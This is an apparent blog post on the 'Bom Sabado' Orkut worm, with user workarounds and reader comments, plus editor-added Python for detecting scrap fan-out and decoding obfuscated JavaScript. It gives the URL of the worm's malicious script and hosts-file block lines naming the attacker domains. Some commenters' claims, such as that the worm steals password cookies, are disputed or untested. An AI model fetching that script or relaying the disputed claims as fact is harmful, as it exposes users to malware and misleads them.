Bom Sabado! Orkut is attacked by a new worm!

In the last hour, I have received many scraps from my friends with the words “Bom Sabado!”.

Needless to say, these were automated messages from my friends, as they don’t know Portuguese. Bom Sabado means Good Saturday in Portuguese.

If you open your scrapbook, the same scrap will be sent to all your friends from your account.

So stay away from Orkut till further notice (or use m.orkut.com till then).
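The propagation pattern just described, one identical scrap posted from a compromised account to every friend within seconds, is what a site operator could flag in scrap-posting logs. The following is an added example, not part of the original post; the log format, user names and thresholds are constructed assumptions:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real Orkut data): "<ISO time> <sender> <recipient> <scrap text>".
# 'carol' shows the worm pattern; 'bob' sends the same text, but slowly and to few people.
SAMPLE_LOG = """\
2010-09-25T10:00:01 alice bob Hey, lunch tomorrow?
2010-09-25T10:02:10 carol alice Bom Sabado!
2010-09-25T10:02:11 carol bob Bom Sabado!
2010-09-25T10:02:11 carol dave Bom Sabado!
2010-09-25T10:02:12 carol erin Bom Sabado!
2010-09-25T10:02:12 carol frank Bom Sabado!
2010-09-25T10:30:00 bob alice Bom Sabado!
2010-09-25T10:40:00 bob dave Bom Sabado!
"""


def parse_line(line):
    """Split one log line into (timestamp, sender, recipient, text)."""
    ts, sender, recipient, text = line.split(" ", 3)
    return datetime.fromisoformat(ts), sender, recipient, text.strip()


def find_fanout(log_text, min_recipients=5, window=timedelta(seconds=60)):
    """Return {(sender, text): recipients} for every sender that posted one
    identical scrap to at least `min_recipients` distinct people within `window`.
    """
    posts = defaultdict(list)  # (sender, text) -> [(timestamp, recipient)]
    for line in log_text.splitlines():
        if line.strip():
            ts, sender, recipient, text = parse_line(line)
            posts[(sender, text)].append((ts, recipient))

    flagged = {}
    for key, events in posts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Sliding window: drop events older than `window` before events[end].
            while events[end][0] - events[start][0] > window:
                start += 1
            recipients = {r for _, r in events[start:end + 1]}
            if len(recipients) >= min_recipients:
                flagged[key] = max(flagged.get(key, 0), len(recipients))
    return flagged


if __name__ == "__main__":
    for (sender, text), n in find_fanout(SAMPLE_LOG).items():
        print(f"{sender}: {n} recipients got {text!r} within 60s")
```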

Update – Do not open Orkut, as per this official forum thread.

Workaround – Below is a workaround posted by Arikarin. Use at your own risk. I didn’t try it.

A way to get rid of this and even to change your pass if you want to is:

  1. Clear your cookies/cache, then you may get an ‘Automated Query’ message. Don’t hustle about it.
  2. Just log out from your account. If you don’t know the logout link, here it is: http://www.orkut.co.in/GLogin?cmd=logout
  3. After that, just go to the settings page, or better still, switch to the ‘OLDER VERSION’ of Orkut and try resetting your password. 🙂

You can use the older version of Orkut or simply the mobile version at m.orkut.com! I used m.orkut.com only!

Update – The above thread also shows this link: http://tptools.org/worm.js

The code responsible for the attack is pasted below, as it will soon be gone from the above URL! 😉

9 Replies to “Bom Sabado! Orkut is attacked by a new worm!”

  1. For everyone whose Orkut account has been affected by the ‘Bom Sabado’ worm….

    The worm injects a hidden iframe containing a malicious JavaScript, http://tptools.org/worm.js [do not click this], which steals the user cookie, which contains the password in an encoded form. So the attacker does not get to know your plaintext password but can log in using your credentials by impersonating you with the cookie to fool the identification system. So a trivial solution is to disable JavaScript; another solution is to disable iframes; or you can take an advanced measure by blocking the domain http://tptools.org/ by editing your hosts file and redirecting it to a safe address, say 127.0.0.1

    Go to C:\windows\system32\drivers\etc\
    There is a file named ‘hosts’. By default it is read-only. Go to its properties and uncheck the tickmark beside read-only.
    Edit it with your favourite editor.

    add this line at the end of it

    127.0.0.1 tptools.org

    Save it, and then restart your network interface (in simple words, just reconnect your internet connection) and bingo!! the worm’ll be useless.

    Hope this helps..

    1. How can you be sure that the JS file steals cookies? I decoded the obfuscated JS and couldn’t find any cookie stealing there! I mean, no JSON request with your cookie as a GET parameter! What it does is initiate some AJAX requests to the Scrapbook, CommunityJoin, etc. URLs and post the data to scrap and join the community…

      @Rahul: What do you think about this? I really don’t think our cookie is by any means getting fetched!
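The decoding step the reply above describes, recovering the readable method and URL names hidden behind a hex-escaped `_0x...` string table, can be automated. The following is an added example by the editor, not code from the post or the commenters; the snippet it decodes is constructed to mimic the worm's obfuscation style and is not the real worm.js:

```python
import ast
import json
import re

# Constructed sample in the style of the worm's obfuscation (not the real worm.js):
# a hex-escaped string table, then code that indexes into it by number.
SAMPLE = (
    'var _0xab12=["\\x53\\x63\\x72\\x61\\x70\\x62\\x6F\\x6F\\x6B\\x3F",'
    '"\\x6F\\x70\\x65\\x6E","\\x50\\x4F\\x53\\x54","\\x73\\x65\\x6E\\x64"];'
    'var r=createXMLHttpRequest();'
    'r[_0xab12[1]](_0xab12[2],_0xab12[0],false);r[_0xab12[3]](null);'
)

TABLE_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];', re.S)
STRING_RE = re.compile(r'"((?:\\.|[^"\\])*)"')


def extract_string_table(src):
    """Return (array name, decoded strings) for the first _0x... string array."""
    m = TABLE_RE.search(src)
    if m is None:
        raise ValueError("no string table found")
    name, body = m.group(1), m.group(2)
    # ast.literal_eval understands the same \xNN escapes as a JS string literal.
    strings = [ast.literal_eval('"' + s + '"') for s in STRING_RE.findall(body)]
    return name, strings


def deobfuscate(src):
    """Inline every table reference so the real method and URL names are visible."""
    name, strings = extract_string_table(src)
    code = src[TABLE_RE.search(src).end():]  # everything after the table itself
    ref = re.compile(re.escape(name) + r'\[(\d+)\]')
    code = ref.sub(lambda m: json.dumps(strings[int(m.group(1))]), code)
    # obj["open"](...) reads better as obj.open(...) when the key is an identifier.
    return re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r'.\1', code)


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Running it on a real sample lists the endpoint strings (scrapbook, community join) as plain text, which is the quickest way to settle what the script actually calls.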

  2. If you visited the Orkut page after the worm attack, then immediately clear cache, cookies… and change your password. Done! Now you are safe… thank you…

  3. Am I safe? I got two Bom Sabado scraps… I didn’t do anything, don’t see any automated communities joined…. later when I opened Orkut I checked my scrapbook and Bom Sabado was gone..

    So am I affected? Do I need to change my password? I used the Google account password to log in to Orkut?

  4. Bom Sabado is spreading like hell

    so whoever is infected, first clear your history and cache

    or follow the following steps

    Bom Sabado is spreading fast in Orkut. Things you should do to avoid getting infected —
    Don’t open your scrapbook at all. Disable JavaScript in your browser, then open your hosts file with Notepad:

    Windows 95/98/Me c:\windows\hosts
    Windows NT/2000/XP Pro c:\winnt\system32\drivers\etc\hosts
    Windows XP Home c:\windows\system32\drivers\etc\hosts
    Win 7 – C:\windows\system32\drivers\etc\hosts

    Add this code at the end

    127.0.0.1 tptools*.*org
    127.0.0.1 www*.*tptools*.*org
    127.0.0.1 convites.001webs*.*com
    127.0.0.1 www*.*convites.001webs*.*com

    Then completely clear your history, including your cache. By the way, they say it is fixed, but do take care…
